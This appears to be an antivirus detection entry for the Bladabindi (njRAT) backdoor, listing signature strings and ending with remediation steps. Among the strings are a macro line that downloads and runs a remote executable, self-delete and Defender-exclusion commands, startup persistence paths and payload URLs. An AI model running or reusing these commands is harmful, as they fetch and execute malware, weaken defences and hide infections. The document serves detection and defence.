Concrete signature match: Backdoor - Provides unauthorized remote access for 32-bit Windows platform, family Bladabindi
Backdoor:Win32/Bladabindi!ml is a concrete detection of a sophisticated backdoor. This malware is designed to grant remote attackers unauthorized access and control over the infected system, likely establishing persistence and storing malicious configuration or exfiltrated data via randomly named registry keys.
Relevant strings associated with this threat:
- ExeName (PEHSTR_EXT)
- w.exe (PEHSTR_EXT)
- w.My.Resources (PEHSTR_EXT)
- CompDir (PEHSTR)
- Software\043ed596af7365236306a463494dc0f4 (REGKEY)
- Software\08f4dc96bbb7af09d1a37fe35c75a42f (REGKEY)
- Software\0be9b5be78fc1a603e5105b3437989a7 (REGKEY)
- Software\102b3bcad4053f1630a0d725fba934ba (REGKEY)
- Software\1052b8e9071d5b658c32c84c463014f5 (REGKEY)
- Software\125d3f6ae0a53efa91122391603b15de (REGKEY)
- Software\12ce4e06a81e8d54fd01d9b762f1b1bb (REGKEY)
- Software\13cf9d8bf1b79e8de8ac0fe37a6739fe (REGKEY)
- Software\1ce5c21bd74c042cdcd945e699c951c5 (REGKEY)
- Software\2320633bbd5b9c41d628d6d2b760a34d (REGKEY)
- Software\23556fb1360f366337f97c924e76ead3 (REGKEY)
- Software\2fd22e8065aba1ef1bdfa994748d4cec (REGKEY)
- Software\301b5fcf8ce2fab8868e80b6c1f912fe (REGKEY)
- Software\45ca55fc1756e880072f0dde4455397b (REGKEY)
- Software\45cd603ee23d7c7a771df421f5721e99 (REGKEY)
- Software\46d93431630fc8e404fed7204e708738 (REGKEY)
- Software\4a926bc2f0d66095f68f194a4f64ff52 (REGKEY)
- Software\55b3825ee39ada2fcddf7c7accbde69e (REGKEY)
- Software\5cd8f17f4086744065eb0992a09e05a2 (REGKEY)
- Software\60f0d0e0d2dd518d7530a18795742b3f (REGKEY)
- server.exe (PEHSTR_EXT)
- \Nouveau (PEHSTR_EXT)
- njRAT.proc.resources (PEHSTR)
- Builder.resources (PEHSTR)
- njRAT.Chat.resources (PEHSTR)
- ntdll (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- avicap32.dll (PEHSTR_EXT)
- cmd.exe / (PEHSTR_EXT)
- ping 127.0.0.1 & del " (PEHSTR_EXT)
- Server.exe (PEHSTR_EXT)
- \stub.exe (PEHSTR_EXT)
- ok.exe (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- \Mr.Zamil\Zamil\obj\Debug\ (PEHSTR_EXT)
- Patch.exe (PEHSTR_EXT)
- NJServer.exe (PEHSTR_EXT)
- NJServer (PEHSTR_EXT)
- NJServer.MDIParent1.resources (PEHSTR_EXT)
- e = "http://icbg-iq.com/Scripts/kinetics/droids/gangrini/upload/regzab.exe" (MACROHSTR_EXT)
- CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True (MACROHSTR_EXT)
- Stub.exe (PEHSTR_EXT)
- CreateObject("Wscript.Shell") (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- .sendkeys"{numlock}" (PEHSTR_EXT)
- .sendkeys"{capslock}" (PEHSTR_EXT)
- .sendkeys"{scrolllock}" (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- Server.sfx.exe (PEHSTR_EXT)
- \Worm (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- ServerComputer (PEHSTR_EXT)
- CopyFromScreen (PEHSTR_EXT)
- System.Net.Sockets (PEHSTR_EXT)
- Svhost64.Hmza (PEHSTR_EXT)
- Svhost64.Utility (PEHSTR_EXT)
- EXE (PEHSTR_EXT)
- C:\Users\NO_LOVINO\ (PEHSTR_EXT)
- TypeScript Keyboard Sync.exe (PEHSTR)
- 33333333.exe (PEHSTR_EXT)
- .exe (PEHSTR)
- System Exporer.pdb (PEHSTR_EXT)
- Source\Repos\deploy\deploy\obj\Debug\deploy.pdb (PEHSTR_EXT)
- crypter black cat semi fud = usar esse = final\software.pdb (PEHSTR_EXT)
- Software.Resources.resources (PEHSTR_EXT)
- #Bw.#Th.resources (PEHSTR_EXT)
- TubeHygrostat.dll (PEHSTR)
- (%%\rundll32.exe TubeHygrostat,Xerophytes (PEHSTR)
- *%%\rundll32.exe Cholecystostomy,Shorelines (PEHSTR)
- Cholecystostomy.dll (PEHSTR)
- %%%\rundll32.exe Creatinine,Shorelines (PEHSTR)
- Creatinine.dll (PEHSTR)
- %%\rundll32.exe Chilblain,Pretor (PEHSTR)
- Chilblain.dll (PEHSTR)
- QcXFu~jV(;".resources (PEHSTR_EXT)
- ~TVqQ,M,,E,,//8,Lg,,,,AQ,,,,,,,,,,,,,,,,,,,,,,,Ag,,A4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ (PEHSTR)
- System.Net.NetworkInformation (PEHSTR_EXT)
- Covid.exe (PEHSTR_EXT)
- https://hastebin.com/raw/maruzucehi (PEHSTR_EXT)
- http://www.gustabf.tk/update.txt (PEHSTR_EXT)
- \Documents\Pass Vault\AccountPassword (PEHSTR_EXT)
- \Documents\Pass Vault\Keys.txt (PEHSTR_EXT)
- \Documents\Pass Vault\KeysDecrypted.txt (PEHSTR_EXT)
- cmd.exe /c ping 0 -n 2 & del (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- Decompress (PEHSTR_EXT)
- ExecBytes (PEHSTR_EXT)
- Beta.Charlie (PEHSTR_EXT)
- good.dll (PEHSTR_EXT)
- /c start /I (PEHSTR_EXT)
- njStub (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- DecompressGzip (PEHSTR_EXT)
- \Documents\dllhost /f (PEHSTR_EXT)
- cmd.exe /C Y /N /D Y /T 1 & Del (PEHSTR_EXT)
- Debug.txt (PEHSTR_EXT)
- Debug\TestCrypter0.pdb (PEHSTR_EXT)
- temp\Assembly.exe (PEHSTR_EXT)
- svchost.Windows (PEHSTR_EXT)
- C:\Users\AShoky (PEHSTR_EXT)
- svchost.pdb (PEHSTR_EXT)
- $this.Text (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- ScreenLock (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- ComputeStringHash (PEHSTR_EXT)
- CompareString (PEHSTR_EXT)
- https://cdn.discordapp.com/attachment (PEHSTR_EXT)
- RunWorkerCompletedEventHandler (PEHSTR_EXT)
- OneDrive.CSGO_ERR.resources (PEHSTR_EXT)
- Phoenix\source\repos\OneDrive\OneDrive\obj\ (PEHSTR_EXT)
- \OneDrive.pdb (PEHSTR_EXT)
- TVqQAAMAAAAEAAAA// (PEHSTR_EXT)
- cubel.userspprtaddrss@gmail.com (PEHSTR_EXT)
- Esyybfsfz.Properties.Resources (PEHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- System.Threading.Tasks (PEHSTR_EXT)
- System.Net.Http (PEHSTR_EXT)
- HttpClient (PEHSTR_EXT)
- FuckinPizdec.core.Config (PEHSTR_EXT)
- Updata.exe (PEHSTR_EXT)
- AAhvUE4rEQTdIaoQ5jS (PEHSTR_EXT)
- AesCryptoServiceProvider (PEHSTR_EXT)
- Anon_SE.Resources.resource (PEHSTR_EXT)
- moc.nibetsap (PEHSTR_EXT)
- /war/@58EC30A9C23230564C@ (PEHSTR_EXT)
- a.top4top.io/p_2428mn69 (PEHSTR_EXT)
- LOST.DIR (PEHSTR_EXT)
- Newtonsoft.Json (PEHSTR_EXT)
- virus@satinfo.es (PEHSTR_EXT)
- Keylogger.Bladabindi (PEHSTR_EXT)
- Malware.Postal (PEHSTR_EXT)
- Ransom.Servcc (PEHSTR_EXT)
- Trojan.DistTrack (PEHSTR_EXT)
- Malware.Zambrano (PEHSTR_EXT)
- OQVwu.dll (PEHSTR_EXT)
- fwsrM.dll (PEHSTR_EXT)
- SHELL.pdb (PEHSTR_EXT)
- SHELL.exe (PEHSTR_EXT)
- C:\Users\xD\source\repos\SHELL\SHELL\obj\Release\SHELL.pdb (PEHSTR_EXT)
- Powered by SmartAssembly 8.1.0.4892 (PEHSTR_EXT)
- 4System.Web.Services.Protocols.SoapHttpClientProtocol (PEHSTR_EXT)
- BasedAntiVT.exe (PEHSTR_EXT)
- asdjJ.My.Resources (PEHSTR_EXT)
- EbVk9dMWvodsu0FgZR.NmURtsZH4NPNGZPSBg (PEHSTR_EXT)
- PNtI1fLt4Uo6sHbjOZ.h4cXQoprHHsXJ7n4FT (PEHSTR_EXT)
- iW9w8DsHAomrjYpRwi.iihBjoh62YiGXsMgBR (PEHSTR_EXT)
- /:/CQ0JX,FV1Vd2We0Sa4Tc4Q (PEHSTR_EXT)
- shell.Run Gbkjkskbnmbsss (PEHSTR_EXT)
- sS.Resources.resource (PEHSTR_EXT)
- SEEDCRACKER.g.resources (PEHSTR_EXT)
- CM_Links.Properties.Resources.resource (PEHSTR_EXT)
- MI.exe (PEHSTR_EXT)
- xra8xOYACcZLOEIdG1.7QPJAtJLH9hkO4Nex9 (PEHSTR_EXT)
- WindowsApplication2.Resources.resource (PEHSTR_EXT)
- tmpC394.tmp (PEHSTR_EXT)
- 33333333.g.resources (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- sss.Resources (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources.resources (PEHSTR_EXT)
- exe2powershell-master (PEHSTR_EXT)
- imfree2.Resources.resource (PEHSTR_EXT)
- Encryptado.exe (PEHSTR_EXT)
- HttpResponse (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- CompressShell (PEHSTR_EXT)
- TVqQ==M====E====//8==Lg=========Q===============================================g=====4fug4=t=nNI (PEHSTR_EXT)
- sk-krona.fun (PEHSTR_EXT)
- qapifexugaroluruje (PEHSTR_EXT)
- textfile.txt (PEHSTR_EXT)
- Microsoft\svchost.exe (PEHSTR_EXT)
- cmd.exe /k ping 0 & del (PEHSTR_EXT)
- root\SecurityCenter (PEHSTR_EXT)
- Nero lait\obj\Debug\Nero lait.pdb (PEHSTR_EXT)
- i_Shitted_My_Self.exe (PEHSTR_EXT)
- http://167.71.14.135 (PEHSTR_EXT)
- Add-MpPreference -ExclusionProcess "svchost.exe" (PEHSTR_EXT)
- AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (PEHSTR_EXT)
- AppData\Roaming\Microsoft\Windows';Add-MpPreference -ExclusionPath 'C:\Users (PEHSTR_EXT)
- Microsoft\Windows\Windows.exe (PEHSTR_EXT)
- powershell.exe (PEHSTR_EXT)
- \obj\Debug\Software.pdb (PEHSTR_EXT)
- X.lugia.resources (PEHSTR_EXT)
- XClient.g.resources (PEHSTR_EXT)
- crypter0.My.Resources (PEHSTR_EXT)
- ExtractAndRunExe (PEHSTR_EXT)
- R///e///////g/A//////s/m/./e////x/////e (PEHSTR_EXT)
- Uninst.exe (PEHSTR_EXT)
- Uninstaller.exe (PEHSTR_EXT)
- Uninstal.exe (PEHSTR_EXT)
- N/T(. (SNID)
- .L`]vM (SNID)
- .0eIM[ (SNID)
- //#9w (SNID)
- "aU\W (SNID)
- Nt^r8f. (SNID)
- KZ.C:S (SNID)
- xzP\yf (SNID)
- \V`bo] (SNID)
- Gag\4 (SNID)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)00da14d8bbe2c85a04314b0ac40c13ebb67fe6693af8e786e63a2c6f6a428b00e4d13cb5c3dcb794f7464ae665fafa2390107672417b8203432a6646344e3895Immediately isolate the infected system from the network. Perform a full system scan with an updated antivirus solution to remove the backdoor and associated components. Review system logs for signs of lateral movement or data exfiltration, and ensure all operating systems and applications are patched to prevent re-infection.